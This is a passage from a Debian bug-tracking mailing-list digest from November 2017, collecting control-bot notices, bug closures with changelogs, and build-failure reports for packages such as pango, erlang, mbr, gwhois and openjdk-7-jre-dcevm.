to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
881793: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881793
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: src:daisy-player
Version: 11.2-1
Severity: serious
Tags: sid buster patch

patch at
https://patches.ubuntu.com/d/daisy-player/daisy-player_11.2-1ubuntu1.patch
--- End Message ---
--- Begin Message ---
Version: 11.2-2

daisy-player (11.2-2) unstable; urgency=medium

  [ Matthias Klose ]
  * Fix build with libcdio 0.94.

  [ Paul Gevers ]
  * Upload in Debian

 -- Paul Gevers   Wed, 15 Nov 2017 19:30:57 +0100



signature.asc
Description: OpenPGP digital signature
--- End Message ---

Processed: Not a problem in stretch

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 881023 buster sid
Bug #881023 {Done: Andreas Tille } 
[src:librcsb-core-wrapper] librcsb-core-wrapper: FTBFS with xerces-c3.2
Added tag(s) sid and buster.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881023: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881023
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: tagging 876892, tagging 850898, tagging 828522, tagging 881358

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 876892 + experimental
Bug #876892 [src:dh-kpatches] dh-kpatches FTBFS with gtk-doc-tools 1.26: 
docbook-2-html: unknown style `gtk'
Added tag(s) experimental.
> tags 850898 - stretch
Bug #850898 [src:sipxtapi] sipxtapi: Please migrate to openssl1.1 in buster
Removed tag(s) stretch.
> tags 828522 + experimental - stretch
Bug #828522 {Done: Lisandro Damián Nicanor Pérez Meyer } 
[src:qt4-x11] qt4-x11: FTBFS with openssl 1.1.0
Added tag(s) experimental.
Bug #828522 {Done: Lisandro Damián Nicanor Pérez Meyer } 
[src:qt4-x11] qt4-x11: FTBFS with openssl 1.1.0
Removed tag(s) stretch.
> tags 881358 + sid buster
Bug #881358 {Done: Sebastian Ramacher } [vdpau-va-driver] 
nvidia_drv_video.so has no function __vaDriverInit_1_0
Added tag(s) sid and buster.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
828522: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=828522
850898: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850898
876892: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876892
881358: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881358
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: tagging 881795

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 881795 + pending
Bug #881795 [src:kover] fix ftbfs with updated libcdio
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881795: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881795
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#859546: owl: FTBFS with openssl 1.1.0

[Tobias Frost]

Control: block -1 by 881693

owl has been requested to be RM'ed in #881693

Processed: Re: owl: FTBFS with openssl 1.1.0

[Debian Bug Tracking System]

Processing control commands:

> block -1 by 881693
Bug #859546 [src:owl] owl: Please migrate to openssl1.1 in buster
859546 was not blocked by any bugs.
859546 was blocking: 871056
Added blocking bug(s) of 859546: 881693

-- 
859546: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=859546
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: tagging 881795

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 881795 - patch
Bug #881795 [src:kover] fix ftbfs with updated libcdio
Removed tag(s) patch.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881795: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881795
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#880674: marked as done (libpango-1.0-0: Thai word break stops working since 1.40.13)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 18:27:56 +
with message-id 
and subject line Bug#880674: fixed in pango1.0 1.40.13-2
has caused the Debian Bug report #880674,
regarding libpango-1.0-0: Thai word break stops working since 1.40.13
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
880674: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=880674
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: libpango-1.0-0
Version: 1.40.13-1
Severity: important

Dear Maintainer,

Since Pango 1.40.13, Thai word break appears to be broken. This affects
all GTK+-based text editors like gedit, mousepad, leafpad, etc. as well as
Mozilla Firefox.

Try, for example, opening this page with Firefox:

  https://linux.thai.net/~thep/text/aphaimanee.html

The long continuous-text paragraph is supposed to be wrapped, but it's not.

Downgrading Pango to 1.40.12 does solve the problem.

Looking at upstream repository, this commit looks like the culprit:

  
https://git.gnome.org/browse/pango/commit/?id=c4619480e536e393e2d4a8e26a6ceb5af1fe80e3

I've tried writing a simple program to test it, and it appears
PangoLogAttr::is_char_break for all Thai characters except the first
one of the line are cleared to zero, which causes break_thai() in
pango/break-thai.c to skip setting is_line_break in all positions.

-- System Information:
Debian Release: buster/sid
  APT prefers unstable-debug
  APT policy: (500, 'unstable-debug'), (500, 'unstable'), (500, 'testing'), (1, 
'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 4.13.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=th_TH.utf8, LC_CTYPE=th_TH.utf8 (charmap=UTF-8), 
LANGUAGE=th_TH.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages libpango-1.0-0 depends on:
ii  fontconfig2.12.3-0.2
ii  libc6 2.24-17
ii  libglib2.0-0  2.54.2-1
ii  libthai0  0.1.27-1

libpango-1.0-0 recommends no packages.

libpango-1.0-0 suggests no packages.

-- no debconf information
--- End Message ---
--- Begin Message ---
Source: pango1.0
Source-Version: 1.40.13-2

We believe that the bug you reported is fixed in the latest version of
pango1.0, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 880...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Michael Biebl  (supplier of updated pango1.0 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Wed, 15 Nov 2017 18:39:29 +0100
Source: pango1.0
Binary: libpango1.0-0 libpango-1.0-0 libpangocairo-1.0-0 libpangoxft-1.0-0 
libpangoft2-1.0-0 libpango1.0-udeb libpango1.0-dev libpango1.0-doc 
gir1.2-pango-1.0 pango1.0-tests
Architecture: source
Version: 1.40.13-2
Distribution: unstable
Urgency: medium
Maintainer: Debian GNOME Maintainers 

Changed-By: Michael Biebl 
Description:
 gir1.2-pango-1.0 - Layout and rendering of internationalized text - gir 
bindings
 libpango-1.0-0 - Layout and rendering of internationalized text
 libpango1.0-0 - Layout and rendering of internationalized text (transitional 
pack
 libpango1.0-dev - Development files for the Pango
 libpango1.0-doc - Documentation files for the Pango
 libpango1.0-udeb - Layout and rendering of internationalized text - minimal 
runtime (udeb)
 libpangocairo-1.0-0 - Layout and rendering of internationalized text
 libpangoft2-1.0-0 - Layout and rendering of internationalized text
 libpangoxft-1.0-0 - Layout and rendering of internationalized text
 pango1.0-tests - Layout and rendering of internationalized text - installed 
tests
Closes: 880674
Changes:
 pango1.0 (1.40.13-2) unstable; urgency=medium
 .
   [ Simon McVittie ]
   * gir1.2-pango-1.0 Provides gir1.2-pangocairo-1.0,
 gir1.2-pangoft2-1.0, gir1.2-pangoxft-1.0 to reflect the additional
 typelibs that it contains
 .
   [ Michael Biebl ]
   * Add 0001-Fix-is_char_break-issue-in-pango_default_break-funct.patch.
 Fixes a regression introduced in 1.40.13 resulting in word wrapping / line
 breaks being broken. (Closes: #880674)

Processed: fixed 881023 in 1.005-5

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> fixed 881023 1.005-5
Bug #881023 {Done: Andreas Tille } 
[src:librcsb-core-wrapper] librcsb-core-wrapper: FTBFS with xerces-c3.2
Marked as fixed in versions librcsb-core-wrapper/1.005-5.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881023: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881023
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: Not a problem in stretch

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 881835 buster sid
Bug #881835 [src:mbr] mbr FTBFS on !amd64 !i386: debhelper got stricter
Added tag(s) buster and sid.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881835: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881835
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#851080: marked as done (erlang: Please migrate to openssl1.1 in buster)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 17:21:19 +
with message-id 
and subject line Bug#851080: fixed in erlang 1:20.1.5+dfsg-1
has caused the Debian Bug report #851080,
regarding erlang: Please migrate to openssl1.1 in buster
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
851080: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851080
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: erlang
Version: 18.3-dfsg-1
Severity: important
Control: block 827061 by -1

Hi,

OpenSSL 1.1.0 is about to released.  During a rebuild of all packages using
OpenSSL this package fail to build.  A log of that build can be found at:
https://breakpoint.cc/openssl-1.1-rebuild-2016-05-29/Attempted/erlang_18.3-dfsg-1_amd64-20160529-1417

On https://wiki.openssl.org/index.php/1.1_API_Changes you can see various of the
reasons why it might fail.  There are also updated man pages at
https://www.openssl.org/docs/manmaster/ that should contain useful information.

There is a libssl-dev package available in experimental that contains a recent
snapshot, I suggest you try building against that to see if everything works.

If you have problems making things work, feel free to contact us.


Kurt
--- End Message ---
--- Begin Message ---
Source: erlang
Source-Version: 1:20.1.5+dfsg-1

We believe that the bug you reported is fixed in the latest version of
erlang, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 851...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sergei Golovan  (supplier of updated erlang package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Wed, 15 Nov 2017 18:57:56 +0300
Source: erlang
Binary: erlang-base erlang-base-hipe erlang-asn1 erlang-common-test 
erlang-corba erlang-crypto erlang-debugger erlang-dialyzer erlang-diameter 
erlang-doc erlang-edoc erlang-eldap erlang-erl-docgen erlang-et erlang-eunit 
erlang-ic erlang-ic-java erlang-inets erlang-manpages erlang-megaco 
erlang-mnesia erlang-observer erlang-odbc erlang-os-mon erlang-parsetools 
erlang-public-key erlang-reltool erlang-runtime-tools erlang-snmp erlang-ssh 
erlang-ssl erlang-syntax-tools erlang-tools erlang-wx erlang-xmerl erlang-dev 
erlang-src erlang-examples erlang-jinterface erlang-mode erlang-nox erlang-x11 
erlang
Architecture: source amd64 all
Version: 1:20.1.5+dfsg-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Erlang Packagers 
Changed-By: Sergei Golovan 
Description:
 erlang - Concurrent, real-time, distributed functional language
 erlang-asn1 - Erlang/OTP modules for ASN.1 support
 erlang-base - Erlang/OTP virtual machine and base applications
 erlang-base-hipe - Erlang/OTP HiPE enabled virtual machine and base 
applications
 erlang-common-test - Erlang/OTP application for automated testing
 erlang-corba - Erlang/OTP applications for CORBA support
 erlang-crypto - Erlang/OTP cryptographic modules
 erlang-debugger - Erlang/OTP application for debugging and testing
 erlang-dev - Erlang/OTP development libraries and headers
 erlang-dialyzer - Erlang/OTP discrepancy analyzer application
 erlang-diameter - Erlang/OTP implementation of RFC 6733 protocol
 erlang-doc - Erlang/OTP HTML/PDF documentation
 erlang-edoc - Erlang/OTP module for generating documentation
 erlang-eldap - Erlang/OTP LDAP library
 erlang-erl-docgen - Erlang/OTP documentation stylesheets
 erlang-et  - Erlang/OTP event tracer application
 erlang-eunit - Erlang/OTP module for unit testing
 erlang-examples - Erlang/OTP application examples
 erlang-ic  - Erlang/OTP IDL compiler
 erlang-ic-java - Erlang/OTP IDL compiler (Java classes)
 erlang-inets - Erlang/OTP Internet clients and servers
 erlang-jinterface - Java communication tool to Erlang
 erlang-manpages - Erlang/OTP manual pages
 erlang-megaco - Erlang/OTP implementation of Megaco/H.248 protocol
 erlang-mnesia - Erlang/OTP distributed relational/object hybrid database
 erlang-mode - Erlang major editing mode for Emacs
 erlang-nox - Erlang/OTP applications that don't require X 

Bug#881814: Processed: libibverbs-dev no longer ships infiniband/driver.h

[Jason Gunthorpe]

> libibverbs-dev
> src:librdmacm
> src:libcxgb3
> src:libmlx4
> src:libipathverbs
> src:libmlx5
> src:libibcm
> src:libmthca
> src:libnes

These are now all part of rdma-core. These packages should be removed
from unstable and all other release suites that have rdma-core.

It is an error to attempt to build them against rdma-core.

> src:libfabric

This is has been fixed in libfabric upstream, look for patches from me.

Jason

Bug#881835: mbr FTBFS on !amd64 !i386: debhelper got stricter

[Helmut Grohne]

Source: mbr
Version: 1.1.11-5.1
Severity: serious
Justification: fails to build from source (but built successfully in the past)
User: helm...@debian.org
Usertags: rebootstrap

E.g. mips64el:

| dh_installdirs -p mbr-udeb sbin
| dh_installdirs: All requested packages have been excluded (e.g. via a 
Build-Profile).
| dh_installdocs -p mbr debian/README-1st.Debian NEWS README AUTHORS
| dh_installdocs: Compatibility levels before 9 are deprecated (level 7 in use)
| dh_installchangelogs
| dh_installchangelogs: Compatibility levels before 9 are deprecated (level 7 
in use)
| /usr/bin/make install INSTALL_PROGRAM="install -s"
| make[1]: Entering directory '/<>'
| make[2]: Entering directory '/<>'
| make[3]: Entering directory '/<>'
| test -z "/<>/debian/mbr//sbin" || mkdir -p -- 
"/<>/debian/mbr//sbin"
|   install -s 'install-mbr' '/<>/debian/mbr//sbin/install-mbr'
| test -z "/<>/debian/mbr/usr/share/man/man8" || mkdir -p -- 
"/<>/debian/mbr/usr/share/man/man8"
|  /usr/bin/install -c -m 644 './install-mbr.8' 
'/<>/debian/mbr/usr/share/man/man8/install-mbr.8'
| make[3]: Leaving directory '/<>'
| make[2]: Leaving directory '/<>'
| make[1]: Leaving directory '/<>'
| cp `pwd`/debian/mbr/sbin/install-mbr `pwd`/debian/mbr-udeb/sbin/
| cp: cannot create regular file '/<>/debian/mbr-udeb/sbin/': No 
such file or directory
| debian/rules:34: recipe for target 'install' failed
| make: *** [install] Error 1
| dpkg-buildpackage: error: fakeroot debian/rules binary-arch subprocess 
returned exit status 2

https://tests.reproducible-builds.org/debian/rb-pkg/unstable/arm64/mbr.html
https://tests.reproducible-builds.org/debian/rb-pkg/unstable/armhf/mbr.html

This is likely because debhelper became more strict recently. You cannot
reproduce this on amd64 or i386 (except by cross building).

Helmut

Bug#681726: Time to remove eclipse from Testing?

[Emmanuel Bourg]

Le 15/11/2017 à 17:01, Adrian Bunk a écrit :

> 2. batik -> maven -> guice -> libspring-java -> aspectj -> eclipse-platform
> Is there some good way to break this dependency chain?

I suspect we build the aspectj eclipse plugin but don't even install it
in the binary package. I'll see if this can be disabled.

Emmanuel Bourg

Bug#881832: python3-bitcoinlib,python3-bitcoin: duplicate packages?

[Andreas Beckmann]

Package: python3-bitcoinlib,python3-bitcoin
Severity: serious
User: trei...@debian.org
Usertags: edos-file-overwrite
Control: found -1 0.8.0-1
Control: found -1 1.1.42-1

Hi,

automatic installation tests of packages that share a file and at the
same time do not conflict by their package dependency relationships has
detected the following problem:

  Selecting previously unselected package python3-bitcoin.
  Preparing to unpack .../python3-bitcoin_1.1.42-1_all.deb ...
  Unpacking python3-bitcoin (1.1.42-1) ...
  dpkg: error processing archive 
/var/cache/apt/archives/python3-bitcoin_1.1.42-1_all.deb (--unpack):
   trying to overwrite '/usr/lib/python3/dist-packages/bitcoin/__init__.py', 
which is also in package python3-bitcoinlib 0.8.0-1
  Errors were encountered while processing:
   /var/cache/apt/archives/python3-bitcoin_1.1.42-1_all.deb

This is a serious bug as it makes installation fail, and violates
sections 7.6.1 and 10.1 of the policy. An optimal solution would
consist in only one of the packages installing that file, and renaming
or removing the file in the other package. Depending on the
circumstances you might also consider Replace relations or file
diversions. If the conflicting situation cannot be resolved then, as a
last resort, the two packages have to declare a mutual
Conflict. Please take into account that Replaces, Conflicts and
diversions should only be used when packages provide different
implementations for the same functionality.

Here is a list of files that are known to be shared by both packages
(according to the Contents file for sid/amd64, which may be
slightly out of sync):

  usr/lib/python3/dist-packages/bitcoin/__init__.py

This bug is assigned to both packages. If you, the maintainers of
the two packages in question, have agreed on which of the packages will
resolve the problem please reassign the bug to that package. You may
also register in the BTS that the other package is affected by the bug.

cheers,

Andreas

PS: for more information about the detection of file overwrite errors
of this kind see https://qa.debian.org/dose/file-overwrites.html


python3-bitcoinlib=0.8.0-1_python3-bitcoin=1.1.42-1.log.gz
Description: application/gzip

Processed: python3-bitcoinlib,python3-bitcoin: duplicate packages?

[Debian Bug Tracking System]

Processing control commands:

> found -1 0.8.0-1
Bug #881832 [python3-bitcoinlib,python3-bitcoin] 
python3-bitcoinlib,python3-bitcoin: duplicate packages?
There is no source info for the package 'python3-bitcoin' at version '0.8.0-1' 
with architecture ''
Marked as found in versions python-bitcoinlib/0.8.0-1.
> found -1 1.1.42-1
Bug #881832 [python3-bitcoinlib,python3-bitcoin] 
python3-bitcoinlib,python3-bitcoin: duplicate packages?
There is no source info for the package 'python3-bitcoinlib' at version 
'1.1.42-1' with architecture ''
Marked as found in versions pybitcointools/1.1.42-1.

-- 
881832: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881832
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: Close bug already marked as fixed

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> close 877310
Bug #877310 [src:nbdkit] nbdkit FTBFS on armhf/i386: FAIL: 
test-socket-activation
Marked Bug as done
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
877310: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=877310
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#681726: Time to remove eclipse from Testing?

[Adrian Bunk]

On Wed, Nov 15, 2017 at 12:08:10AM +0100, Markus Koschany wrote:
>...
> We should definitely try to avoid this sort of dependency mess in the
> future by packaging important libraries like eclipse-rcp in a separate
> source package. That would be similar to what we are doing whith
> Netbeans and libnb-platform18-java at the moment. It simply ensures that
> we can resolve such issues more easily by dropping the hard to maintain
> IDE but keeping other important dependencies which don't require that
> much effort in theory.

I tried to sort out what I could find as required for getting the
ancient eclipse out of testing in [1]:

1. src:bnd
You fixed that already.

2. batik -> maven -> guice -> libspring-java -> aspectj -> eclipse-platform
Is there some good way to break this dependency chain?

3. split libequinox-osgi-java out of src:eclise
Or as a short-term hack, build only libequinox-osgi-java from src:eclipse.

> Regards,
> 
> Markus

cu
Adrian

[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=880470#10

-- 

   "Is there not promise of rain?" Ling Tan asked suddenly out
of the darkness. There had been need of rain for many days.
   "Only a promise," Lao Er said.
   Pearl S. Buck - Dragon Seed

Bug#881058: gwhois: diff for NMU version 20120626-1.2

[gregor herrmann]

Control: tags 881058 + patch
Control: tags 881058 + pending

Dear maintainer,

I've prepared an NMU for gwhois (versioned as 20120626-1.2) and
uploaded it to DELAYED/15. Please feel free to tell me if I
should delay it longer.

Regards.

-- 
 .''`.  https://info.comodo.priv.at/ - Debian Developer https://www.debian.org
 : :' : OpenPGP fingerprint D1E1 316E 93A7 60A8 104D  85FA BB3A 6801 8649 AA06
 `. `'  Member of VIBE!AT & SPI, fellow of the Free Software Foundation Europe
   `-   NP: Ostbahn-Kurti & Die Chefpartie: Da Joker
diff -Nru gwhois-20120626/debian/changelog gwhois-20120626/debian/changelog
--- gwhois-20120626/debian/changelog	2017-07-15 01:12:47.0 +0200
+++ gwhois-20120626/debian/changelog	2017-11-15 16:44:51.0 +0100
@@ -1,3 +1,12 @@
+gwhois (20120626-1.2) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Fix "please switch Depends from lynx-cur to lynx":
+do as the bug report requests.
+(Closes: #881058)
+
+ -- gregor herrmann   Wed, 15 Nov 2017 16:44:51 +0100
+
 gwhois (20120626-1.1) unstable; urgency=medium
 
   * Non-maintainer upload.
diff -Nru gwhois-20120626/debian/control gwhois-20120626/debian/control
--- gwhois-20120626/debian/control	2015-04-17 23:30:06.0 +0200
+++ gwhois-20120626/debian/control	2017-11-15 16:43:54.0 +0100
@@ -7,7 +7,7 @@
 
 Package: gwhois
 Architecture: all
-Depends: ${misc:Depends}, debconf | debconf-2.0, perl, libwww-perl, lynx-cur, curl, libnet-libidn-perl
+Depends: ${misc:Depends}, debconf | debconf-2.0, perl, libwww-perl, lynx, curl, libnet-libidn-perl
 Suggests: openbsd-inetd | inet-superserver
 Description: generic Whois Client / Server
  gwhois is a generic whois client / server. This means that it know


signature.asc
Description: Digital Signature

Processed: gwhois: diff for NMU version 20120626-1.2

[Debian Bug Tracking System]

Processing control commands:

> tags 881058 + patch
Bug #881058 [gwhois] gwhois: please switch Depends from lynx-cur to lynx
Added tag(s) patch.
> tags 881058 + pending
Bug #881058 [gwhois] gwhois: please switch Depends from lynx-cur to lynx
Added tag(s) pending.

-- 
881058: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881058
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881827: pykde4 FTBFS: sip: ::KFontChooser ctor argument 5 has an unsupported type for a Python signature

[Adrian Bunk]

Source: pykde4
Version: 4:4.14.3-3
Severity: serious

Some recent change in unstable makes pykde4 FTBFS:


https://teshttps://tests.reproducible-builds.org/debian/history/pykde4.html
ts.reproducible-builds.org/debian/rb-pkg/unstable/amd64/pykde4.html

...
sip: ::KFontChooser ctor argument 5 has an unsupported type for a Python 
signature - provide a valid type, %MethodCode and a C++ signature
CMakeFiles/python_module_PyKDE4_kio.dir/build.make:185: recipe for target 
'sip/kio/sipkiopart0.cpp' failed
make[5]: *** [sip/kio/sipkiopart0.cpp] Error 1

Bug#881824: openjdk-7-jre-dcevm: FTBFS due to -Werror=format-overflow

[Andreas Beckmann]

Source: openjdk-7-jre-dcevm
Version: 7u79-4
Severity: serious
Justification: fails to build from source (but built successfully in the past)

Hi,

openjdk-7-jre-dcevm FTBFS in a current sid+experimental environment:

Compiling /build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp
rm -f ../generated/adfiles/output_c.o
g++ -DLINUX -D_GNU_SOURCE -DIA32 
-I/build/openjdk-7-jre-dcevm-7u79/src/share/vm/prims 
-I/build/openjdk-7-jre-dcevm-7u79/src/share/vm 
-I/build/openjdk-7-jre-dcevm-7u79/src/share/vm/precompiled -I/build/openjdk-7-jr
e-dcevm-7u79/src/cpu/x86/vm 
-I/build/openjdk-7-jre-dcevm-7u79/src/os_cpu/linux_x86/vm 
-I/build/openjdk-7-jre-dcevm-7u79/src/os/linux/vm 
-I/build/openjdk-7-jre-dcevm-7u79/src/os/posix/vm -I/build/openjdk-7-jre-dcev
m-7u79/src/share/vm/adlc -I../generated -DASSERT -g -O2 
-fdebug-prefix-map=/build/openjdk-7-jre-dcevm-7u79=. -fstack-protector-strong 
-Wformat -Werror=format-security -DTARGET_OS_FAMILY_linux -DTARGET_ARCH_x86 -DT
ARGET_ARCH_MODEL_x86_32 -DTARGET_OS_ARCH_linux_x86 
-DTARGET_OS_ARCH_MODEL_linux_x86_32 -DTARGET_COMPILER_gcc -DCOMPILER2 
-DCOMPILER1  -fno-rtti -fno-exceptions -D_REENTRANT -fcheck-new 
-fvisibility=hidden -m32 -ma
rch=i586 -pipe -g -DTARGET_OS_FAMILY_linux -DTARGET_ARCH_x86 
-DTARGET_ARCH_MODEL_x86_32 -DTARGET_OS_ARCH_linux_x86 
-DTARGET_OS_ARCH_MODEL_linux_x86_32 -DTARGET_COMPILER_gcc -DCOMPILER2 
-DCOMPILER1  -fno-rtti -fno-
exceptions -D_REENTRANT -fcheck-new -fvisibility=hidden -m32 -march=i586 -pipe 
-g -Werror -c -o ../generated/adfiles/output_c.o 
/build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp 
/build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp: In member 
function 'void ArchDesc::build_pipe_classes(FILE*)':
/build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp:601:6: error: 
'%*d' directive output between 1 and 2147483647 bytes may cause result to 
exceed 'INT_MAX' [-Werror=format-overflow=]
 void ArchDesc::build_pipe_classes(FILE *fp_cpp) {
  ^~~~
/build/openjdk-7-jre-dcevm-7u79/src/share/vm/adlc/output_c.cpp:601:6: note: 
directive argument in the range [0, 2147483647]
cc1plus: all warnings being treated as errors
/build/openjdk-7-jre-dcevm-7u79/make/linux/makefiles/adlc.make:214: recipe for 
target '../generated/adfiles/output_c.o' failed
make[6]: *** [../generated/adfiles/output_c.o] Error 1

This is likely a new warning in the current gcc.


Andreas


openjdk-7-jre-dcevm_7u79-4.log.gz
Description: application/gzip

Bug#881821: stylish-haskell build depends on libghc-syb-dev (< 0.7) but 0.7-1 is to be installed

[Adrian Bunk]

Source: stylish-haskell
Version: 0.7.1.0-1
Severity: serious

The following packages have unmet dependencies:
 builddeps:stylish-haskell : Depends: libghc-syb-dev (< 0.7) but 0.7-1 is to be 
installed

Bug#881820: pkg-haskell-tools build depends on libghc-concurrent-output-dev (< 1.8) but 1.9.2-1 is to be installed

[Adrian Bunk]

Source: pkg-haskell-tools
Version: 0.11.0
Severity: serious

The following packages have unmet dependencies:
 builddeps:pkg-haskell-tools : Depends: libghc-concurrent-output-dev (< 1.8) 
but 1.9.2-1 is to be installed

Bug#881816: openstack-dashboard: fails to install non-interactively: postinst debconfage fails

[Adam Borowski]

Package: openstack-dashboard
Version: 3:12.0.0-3
Severity: serious
Justification: fails to install, makes rbdeps FTBFS

Hi!
When installing openstack-dashboard non-interactively, it fails with:

Setting up openstack-dashboard (3:12.0.0-3) ...
dpkg: error processing package openstack-dashboard (--configure):
 installed openstack-dashboard package post-installation script subprocess 
returned error exit status 30

Interactively, it asks questions then succeeds.  But as it's a
build-dependency of several packages (ironic-ui, manila-ui, etc), it must
be installable inside sbuild.


Meow!
-- System Information:
Debian Release: buster/sid
  APT prefers unstable-debug
  APT policy: (500, 'unstable-debug'), (500, 'unstable'), (500, 'testing'), (1, 
'experimental')
Architecture: armhf (armv7l)

Kernel: Linux 4.14.0-00115-g3d7c587c4c1b (SMP w/4 CPU cores; PREEMPT)
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8), LANGUAGE=C.UTF-8 
(charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages openstack-dashboard depends on:
ii  adduser3.116
ii  debconf [debconf-2.0]  1.5.65
pn  libjs-jquery   
pn  libjs-jquery-cookie
pn  python 
pn  python-django-horizon  

openstack-dashboard recommends no packages.

Versions of packages openstack-dashboard suggests:
pn  memcached   
pn  openstack-dashboard-apache  

Bug#881815: wagon2: missing build dependency on libplexus-classworlds2-java

[Adrian Bunk]

Source: wagon2
Version: 2.12-3
Severity: serious

https://tests.reproducible-builds.org/debian/rb-pkg/unstable/amd64/wagon2.html

...
[WARNING] The POM for org.codehaus.plexus:plexus-classworlds:jar:2.x is 
missing, no dependency information available
[WARNING] The artifact org.codehaus.plexus:plexus-container-default:jar:1.5.5 
has been relocated to org.codehaus.plexus:plexus-container-default:jar:debian
[INFO] 
[INFO] Reactor Summary:
[INFO] 
[INFO] Apache Maven Wagon . SUCCESS [  0.599 s]
[INFO] Apache Maven Wagon :: API .. SUCCESS [  3.703 s]
[INFO] Apache Maven Wagon :: Provider Test  SUCCESS [  1.455 s]
[INFO] Apache Maven Wagon :: Providers  SUCCESS [  0.027 s]
[INFO] Apache Maven Wagon :: Providers :: File Provider ... SUCCESS [  0.293 s]
[INFO] Apache Maven Wagon :: Providers :: FTP Provider  SUCCESS [  0.430 s]
[INFO] Apache Maven Wagon :: Providers :: HTTP Shared Library SUCCESS [  0.228 
s]
[INFO] Apache Maven Wagon :: Test Compatibility Kits .. SUCCESS [  0.006 s]
[INFO] Apache Maven Wagon :: HTTP Test Compatibility Kit .. FAILURE [  0.016 s]
[INFO] Apache Maven Wagon :: Providers :: HTTP Provider ... SKIPPED
[INFO] Apache Maven Wagon :: Providers :: Lightweight HTTP Provider SKIPPED
[INFO] 
[INFO] BUILD FAILURE
